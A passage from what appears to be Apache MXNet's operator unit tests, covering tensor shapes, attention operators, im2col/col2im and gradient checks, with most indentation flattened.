check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@pytest.mark.serial
def test_index_array():
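    # contrib.index_array returns, for every element of the input, its N-dimensional index;
    # the expected outputs below are built with np.mgrid stacked along the last axis.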
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
    for active in [True, False]:
        with mx.np_shape(active=active):
            check_concat((0, 3, 4), (5, 3, 4), 0)
            check_concat((8, 0, 5), (8, 7, 5), 1)
            check_concat((8, 0, 0), (8, 0, 0), 2)
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'log_sigmoid', 'mish', 'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
            assertRaises(MXNetError, mx.nd.random_poisson, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
            high = 1
            assertRaises(MXNetError, mx.nd.random_uniform, low, high, shape)
def check_multihead_attention_selfatt(dtype):
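    # Builds the same self-attention block twice: once with the fused
    # contrib.interleaved_matmul_selfatt_{qk,valatt} operators and once from plain
    # FullyConnected/batch_dot primitives, then checks that outputs, attention scores,
    # and all gradients match.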
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
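    # convert_weight/convert_bias above interleave the q/k/v projection parameters per head,
    # which is the layout consumed by the fused qkv FullyConnected + interleaved_matmul_selfatt_*
    # path below.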
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
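    # Same idea as the self-attention case, but only the k/v parameters are interleaved per head
    # for the fused kv projection; q is projected separately and fed to interleaved_matmul_encdec_qk.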
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
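    # Illustrative check (added for clarity, not part of the original test): with a
    # 3x3 kernel, stride 2, dilation 2 and padding 1, a 30-pixel axis yields
    # (30 + 2*1 - (2*(3-1) + 1)) // 2 + 1 = 14 output positions.
    assert compute_output_size(30, 3, stride=2, dilate=2, pad=1) == 14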
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
